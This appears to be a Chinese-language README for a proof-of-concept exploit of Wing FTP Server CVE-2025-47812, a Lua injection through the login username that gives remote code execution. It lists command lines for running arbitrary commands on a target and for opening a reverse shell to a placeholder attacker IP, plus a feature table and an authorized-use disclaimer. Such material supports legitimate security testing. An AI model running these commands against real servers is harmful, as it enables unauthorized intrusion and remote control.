
Wing FTP 服务器 (CVE-2025-47812) 的远程命令执行漏洞利用
本仓库提供了针对Wing FTP服务器中CVE-2025-47812(远程代码执行漏洞)的概念验证利用代码。攻击者可以通过在认证过程中滥用username参数注入并执行任意的Lua系统命令,从而实现完全的远程代码执行。
found_uids.txt执行简单shell命令:
python3 CVE-2025-47812.py --url http://target:5466 --cmd "id"
触发反向shell:
python3 CVE-2025-47812.py --url http://target:5466 --reverse --ip YOUR_IP --port 4444
试运行模式(不会发送任何请求):
python3 CVE-2025-47812.py --url http://target:5466 --cmd "whoami" --dry-run
| 功能/改进 | 描述 |
|---|---|
| ✅ 参数解析 | 添加argparse CLI支持,用于非交互模式 |
| 🔐 输入验证 | 在尝试利用前确保URL/IP/端口有效 |
| 📦 头重构 | 将HTTP头提取为可复用函数以保持一致性 |
| 📄 UID日志记录 | 将成功的UID令牌保存到found_uids.txt |
| 🧪 试运行模式 | 允许在没有发送请求的情况下安全测试(--dry-run) |
| 🕒 超时+重试 | 添加请求超时和失败时自动重试 |
| 🧼 有效载荷可读性 | 重新格式化Lua注入字符串以提高清晰度和可维护性 |
| 📊 结构化输出 | 用分隔符包裹服务器响应和有效载荷信息,便于读取 |
| ⚠️ 状态码检查 | 如果目标返回意外的HTTP状态码,向用户发出警告 |
| 📝 日志系统 | 用Python logging模块替换print(),更好地控制详细程度 |
本项目仅用于教育和授权的安全测试。
请不要在您不拥有或未经明确许可的系统上使用此工具。